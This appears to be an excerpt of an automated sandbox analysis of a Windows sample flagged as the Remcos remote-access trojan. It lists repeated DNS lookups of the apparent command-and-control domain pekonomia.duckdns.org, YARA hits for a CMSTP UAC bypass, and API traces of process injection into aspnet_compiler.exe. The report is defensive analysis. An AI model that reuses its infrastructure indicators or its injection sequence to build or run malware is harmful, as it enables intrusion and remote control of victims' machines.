              Jun 6, 2023 17:24:46.503317118 CEST192.168.2.48.8.8.80xeec7Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:48.273422956 CEST192.168.2.48.8.8.80x5bStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:50.250770092 CEST192.168.2.48.8.8.80x460aStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:52.222918987 CEST192.168.2.48.8.8.80xf2aaStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:54.251509905 CEST192.168.2.48.8.8.80xccbdStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:55.971133947 CEST192.168.2.48.8.8.80xed15Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:57.762820959 CEST192.168.2.48.8.8.80x81b3Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:59.581954956 CEST192.168.2.48.8.8.80xfba9Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:01.598633051 CEST192.168.2.48.8.8.80x85f4Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:03.282915115 CEST192.168.2.48.8.8.80x7a4dStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:04.892241955 CEST192.168.2.48.8.8.80xe585Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:06.580219984 CEST192.168.2.48.8.8.80x8514Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:08.251962900 CEST192.168.2.48.8.8.80x57d7Standard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:10.254165888 CEST192.168.2.48.8.8.80xb90fStandard query (0)pekonomia.duckdns.orgA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jun 6, 2023 17:23:10.011384964 CEST8.8.8.8192.168.2.40xc728No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:11.872504950 CEST8.8.8.8192.168.2.40xa0ddNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:13.844806910 CEST8.8.8.8192.168.2.40x351cNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:15.609191895 CEST8.8.8.8192.168.2.40x3285No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:19.779814005 CEST8.8.8.8192.168.2.40x8664No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:21.747344971 CEST8.8.8.8192.168.2.40xb42cNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:23.862986088 CEST8.8.8.8192.168.2.40x9c55No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:25.599648952 CEST8.8.8.8192.168.2.40xee2aNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:29.394942999 CEST8.8.8.8192.168.2.40x6115No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:31.218715906 CEST8.8.8.8192.168.2.40x7b8aNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:32.805476904 CEST8.8.8.8192.168.2.40x26d9No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:34.549218893 CEST8.8.8.8192.168.2.40xb5bbNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:36.123658895 CEST8.8.8.8192.168.2.40x3babNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:37.670564890 CEST8.8.8.8192.168.2.40x7d9bNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:39.644150972 CEST8.8.8.8192.168.2.40x636fNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:41.752347946 CEST8.8.8.8192.168.2.40x4052No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:43.385559082 CEST8.8.8.8192.168.2.40x7272No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:45.069904089 CEST8.8.8.8192.168.2.40x2741No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:46.563900948 CEST8.8.8.8192.168.2.40xb4a1No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:48.329842091 CEST8.8.8.8192.168.2.40xad87No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:49.874944925 CEST8.8.8.8192.168.2.40x70fcNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:53.485065937 CEST8.8.8.8192.168.2.40xc5a1No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:55.528429985 CEST8.8.8.8192.168.2.40xe4f4No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:57.421524048 CEST8.8.8.8192.168.2.40xcb52No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:23:59.431236982 CEST8.8.8.8192.168.2.40x8c91No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:01.141323090 CEST8.8.8.8192.168.2.40x1d7bNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:02.915380001 CEST8.8.8.8192.168.2.40xcf14No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:04.649470091 CEST8.8.8.8192.168.2.40x1f5eNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:08.438074112 CEST8.8.8.8192.168.2.40x361cNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:10.369967937 CEST8.8.8.8192.168.2.40x5ef9No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:12.213613033 CEST8.8.8.8192.168.2.40xc983No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:14.108341932 CEST8.8.8.8192.168.2.40x950dNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:16.442303896 CEST8.8.8.8192.168.2.40x52b5No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:18.340361118 CEST8.8.8.8192.168.2.40xed56No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:20.526863098 CEST8.8.8.8192.168.2.40x204eNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:22.098330021 CEST8.8.8.8192.168.2.40x2055No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:23.549674034 CEST8.8.8.8192.168.2.40x7c82No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:25.314686060 CEST8.8.8.8192.168.2.40x16bfNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:29.134788036 CEST8.8.8.8192.168.2.40xcae8No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:30.799817085 CEST8.8.8.8192.168.2.40x414fNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:32.472512960 CEST8.8.8.8192.168.2.40x1cc5No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:34.303818941 CEST8.8.8.8192.168.2.40x1385No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:36.231791019 CEST8.8.8.8192.168.2.40x5c3cNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:38.069847107 CEST8.8.8.8192.168.2.40x625aNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:39.715939045 CEST8.8.8.8192.168.2.40x6d9bNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:41.397990942 CEST8.8.8.8192.168.2.40x947bNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:43.029664993 CEST8.8.8.8192.168.2.40x7d50No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:44.672501087 CEST8.8.8.8192.168.2.40xdd7No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:46.522917032 CEST8.8.8.8192.168.2.40xeec7No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:48.292912006 CEST8.8.8.8192.168.2.40x5bNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:50.273751974 CEST8.8.8.8192.168.2.40x460aNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:52.245238066 CEST8.8.8.8192.168.2.40xf2aaNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:54.279695988 CEST8.8.8.8192.168.2.40xccbdNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:55.990896940 CEST8.8.8.8192.168.2.40xed15No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:57.783139944 CEST8.8.8.8192.168.2.40x81b3No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:59.601772070 CEST8.8.8.8192.168.2.40xfba9No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:01.621582031 CEST8.8.8.8192.168.2.40x85f4No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:03.311701059 CEST8.8.8.8192.168.2.40x7a4dNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:04.906692028 CEST8.8.8.8192.168.2.40xe585No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:06.607954979 CEST8.8.8.8192.168.2.40x8514No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:08.266287088 CEST8.8.8.8192.168.2.40x57d7No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:10.273897886 CEST8.8.8.8192.168.2.40xb90fNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:1
              Start time:17:23:04
              Start date:06/06/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):false
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x18ff8920000
              File size:500224 bytes
              MD5 hash:66108176E22E6F9513A62C76F2185468
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              General

              Target ID:2
              Start time:17:23:06
              Start date:06/06/2023
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Imagebase:0xec0000
              File size:55400 bytes
              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:12.1%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:38
                Total number of Limit Nodes:0
                execution_graph 3160 7ff814e79d2f 3163 7ff814e78cd8 3160->3163 3162 7ff814e79408 3164 7ff814e78ce1 VirtualAllocEx 3163->3164 3166 7ff814e7b149 3164->3166 3166->3162 3128 7ff814e7a82d 3129 7ff814e7a83f CreateProcessW 3128->3129 3131 7ff814e7aacc 3129->3131 3136 7ff814e7b48d 3137 7ff814e7b49f ResumeThread 3136->3137 3139 7ff814e7b55c 3137->3139 3156 7ff814e795ec 3157 7ff814e79f38 3156->3157 3158 7ff814e78cc8 VirtualAllocEx 3157->3158 3159 7ff814e79f5e 3158->3159 3140 7ff814e7ae55 3141 7ff814e7ae6f ReadProcessMemory 3140->3141 3143 7ff814e7af9f 3141->3143 3175 7ff814e79472 3177 7ff814e79477 3175->3177 3178 7ff814e79408 3177->3178 3179 7ff814e78c88 3177->3179 3180 7ff814e78c91 Wow64SetThreadContext 3179->3180 3182 7ff814e7ada1 3180->3182 3182->3177 3132 7ff814e7b19d 3133 7ff814e7b1ab WriteProcessMemory 3132->3133 3135 7ff814e7b324 3133->3135 3183 7ff814e7affd 3184 7ff814e7b00b VirtualAllocEx 3183->3184 3186 7ff814e7b149 3184->3186 3171 7ff814e78c78 3172 7ff814e78c81 Wow64SetThreadContext 3171->3172 3174 7ff814e7ada1 3172->3174 3148 7ff814e79f03 3149 7ff814e79f09 3148->3149 3152 7ff814e78cc8 3149->3152 3153 7ff814e78cd1 VirtualAllocEx 3152->3153 3155 7ff814e79f5e 3153->3155

                Executed Functions

                Function 00007FF814E7A82D Relevance: 1.9, APIs: 1, Instructions: 371processCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 0be1e41d3251619bf6a29ef9f05525ec4010a70c10f9914f206735610cfc2f9f
                • Instruction ID: 7f92b55bf2d3f1b69a9d095c27004555fef4f931020132d37ddd7b74dbbcea0e
                • Opcode Fuzzy Hash: 0be1e41d3251619bf6a29ef9f05525ec4010a70c10f9914f206735610cfc2f9f
                • Instruction Fuzzy Hash: B4C1F570908A1D8FDB98DF58C894BE9B7F1FB69311F1001AAD40DE3291DB75AA85CF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E7B19D Relevance: 1.7, APIs: 1, Instructions: 212injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 119 7ff814e7b19d-7ff814e7b1a9 120 7ff814e7b1ab-7ff814e7b1b3 119->120 121 7ff814e7b1b4-7ff814e7b261 119->121 120->121 124 7ff814e7b289-7ff814e7b322 WriteProcessMemory 121->124 125 7ff814e7b263-7ff814e7b286 121->125 126 7ff814e7b32a-7ff814e7b386 124->126 127 7ff814e7b324 124->127 125->124 127->126
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 5584add3778cc360958a1e9945e66f6091e18aa6c9c2d79d350f377eb8b202f0
                • Instruction ID: c3bc7ebae7cc1252912fbeb92ae7764feeaf8430a3ee8b0a2750b842cfcc2fa6
                • Opcode Fuzzy Hash: 5584add3778cc360958a1e9945e66f6091e18aa6c9c2d79d350f377eb8b202f0
                • Instruction Fuzzy Hash: 30611370908A5D8FDB98DF58C884BE9BBF1FB6A325F1041AED04DE3251DB74A985CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E7AC45 Relevance: 1.7, APIs: 1, Instructions: 190threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 129 7ff814e7ac45-7ff814e7ac51 130 7ff814e7ac5c-7ff814e7ad14 129->130 131 7ff814e7ac53-7ff814e7ac5b 129->131 134 7ff814e7ad36-7ff814e7ad9f Wow64SetThreadContext 130->134 135 7ff814e7ad16-7ff814e7ad33 130->135 131->130 136 7ff814e7ada7-7ff814e7adf1 134->136 137 7ff814e7ada1 134->137 135->134 137->136
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: e700a6937493b1bfa582f5061b654456474df6f5cb17970f610508cd35eca2e2
                • Instruction ID: 6cb90afc0a7fc8f03d36de2b3b232bc93b7892256ef48a82aa143accaf4938bd
                • Opcode Fuzzy Hash: e700a6937493b1bfa582f5061b654456474df6f5cb17970f610508cd35eca2e2
                • Instruction Fuzzy Hash: 5C519070D08A4D8FDB55DF98C884BEABBF1FB6A321F1482AAD048D7255D7749885CF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E78CC8 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 139 7ff814e78cc8-7ff814e7b147 VirtualAllocEx 145 7ff814e7b14f-7ff814e7b19b 139->145 146 7ff814e7b149 139->146 146->145
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d54529af8668dac983fef080d8d0d97448dc75064b33ee2d5475c324e9b76f18
                • Instruction ID: 4afa58cda0a00cf78af944fe03a5941fb9c5d3944d3980463a22b4d455c681c2
                • Opcode Fuzzy Hash: d54529af8668dac983fef080d8d0d97448dc75064b33ee2d5475c324e9b76f18
                • Instruction Fuzzy Hash: 8E510770908A4C8FDF98DF58C885BE9BBF1FB69320F1041AED44DE3251DA30A985CB45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E7AFFD Relevance: 1.7, APIs: 1, Instructions: 186memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 148 7ff814e7affd-7ff814e7b009 149 7ff814e7b00b-7ff814e7b013 148->149 150 7ff814e7b014-7ff814e7b059 148->150 149->150 152 7ff814e7b060-7ff814e7b147 VirtualAllocEx 150->152 153 7ff814e7b14f-7ff814e7b19b 152->153 154 7ff814e7b149 152->154 154->153
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: d316f22af7937459d39c09f9073ea0411caaf1193ab74c39308c886373c7c71b
                • Instruction ID: 39bfee4fea81eba82658189b369f7377bc0bffd46fe551a0ef0f19873ca084e8
                • Opcode Fuzzy Hash: d316f22af7937459d39c09f9073ea0411caaf1193ab74c39308c886373c7c71b
                • Instruction Fuzzy Hash: BA512730908A4D8FDF98DF58C885BE9BBB1FB5A324F1041AED44DE3251DA30A985CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E78CD8 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 156 7ff814e78cd8-7ff814e7b059 159 7ff814e7b060-7ff814e7b147 VirtualAllocEx 156->159 160 7ff814e7b14f-7ff814e7b19b 159->160 161 7ff814e7b149 159->161 161->160
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51bdba0013c1798d09d84b7cf69914945c7f282a072ec251b55e6a1d7a3af23e
                • Instruction ID: 22bb70827eb9a1ff60f0c26c02afedc2bd73405022d43edf66315562264aee96
                • Opcode Fuzzy Hash: 51bdba0013c1798d09d84b7cf69914945c7f282a072ec251b55e6a1d7a3af23e
                • Instruction Fuzzy Hash: A851F570908A0C8FDF98DF58D885BE9BBF1FB6A315F1051AED04DE3251DA70A985CB44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E7AE55 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 163 7ff814e7ae55-7ff814e7af9d ReadProcessMemory 166 7ff814e7af9f 163->166 167 7ff814e7afa5-7ff814e7affb 163->167 166->167
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 49982788874eb117e3390a34be1a1e93237199ffd232ddb503e75af661956f58
                • Instruction ID: 9a3c6518c84f933a414a4562c0a5a518f7add7e228f511b941d52d3e6007f3c1
                • Opcode Fuzzy Hash: 49982788874eb117e3390a34be1a1e93237199ffd232ddb503e75af661956f58
                • Instruction Fuzzy Hash: 9051F170908A4C8FDB98DF58C884BE9BBB1FB6A311F1091AED44DE7252DA749985CF40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E78C88 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 169 7ff814e78c88-7ff814e7ad14 175 7ff814e7ad36-7ff814e7ad9f Wow64SetThreadContext 169->175 176 7ff814e7ad16-7ff814e7ad33 169->176 177 7ff814e7ada7-7ff814e7adf1 175->177 178 7ff814e7ada1 175->178 176->175 178->177
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3b1319e5f1632fd473b544754efe059ecfdebf7f3bbbfff8f101a2ee586fe1ce
                • Instruction ID: 6edd79e365a6676483f7ba68642f24941e8208ade6e5b1aa6e55a6c54434f985
                • Opcode Fuzzy Hash: 3b1319e5f1632fd473b544754efe059ecfdebf7f3bbbfff8f101a2ee586fe1ce
                • Instruction Fuzzy Hash: CD515D70D08A4C8FEB94DF99C885BEABBF1FB69321F10826AD048D7255D7749985CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E78C98 Relevance: 1.7, APIs: 1, Instructions: 170COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 180 7ff814e78c98-7ff814e7ad14 184 7ff814e7ad36-7ff814e7ad9f Wow64SetThreadContext 180->184 185 7ff814e7ad16-7ff814e7ad33 180->185 186 7ff814e7ada7-7ff814e7adf1 184->186 187 7ff814e7ada1 184->187 185->184 187->186
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 551c53ce45470f8191424b52fb5bf9bc1654f81e08ebc9a8e589094783f8ff03
                • Instruction ID: 4ac6281577ef8bfeb496495f4579f8e7bb4984ec480bb618978d99eb8b8b8813
                • Opcode Fuzzy Hash: 551c53ce45470f8191424b52fb5bf9bc1654f81e08ebc9a8e589094783f8ff03
                • Instruction Fuzzy Hash: 72514E70D08A0C8FEB94DF99C884BEABBF1FB55321F10826AD009D7255D7749885CF80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FF814E7B48D Relevance: 1.6, APIs: 1, Instructions: 123threadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 189 7ff814e7b48d-7ff814e7b55a ResumeThread 192 7ff814e7b55c 189->192 193 7ff814e7b562-7ff814e7b5a0 189->193 192->193
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: c978e47a6a50cb461a8eca8b8e1d013bb873b5dd699ee3eb298564c3bd962331
                • Instruction ID: 538ff642741fca701f102cab7163f3721294dcb299ade44eb1af9733f6d4f4f7
                • Opcode Fuzzy Hash: c978e47a6a50cb461a8eca8b8e1d013bb873b5dd699ee3eb298564c3bd962331
                • Instruction Fuzzy Hash: 6541F970E08A4C8FDF98DF98D885BADBBB0FB5A321F10416ED049E7252DA749885CF41
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:3.3%
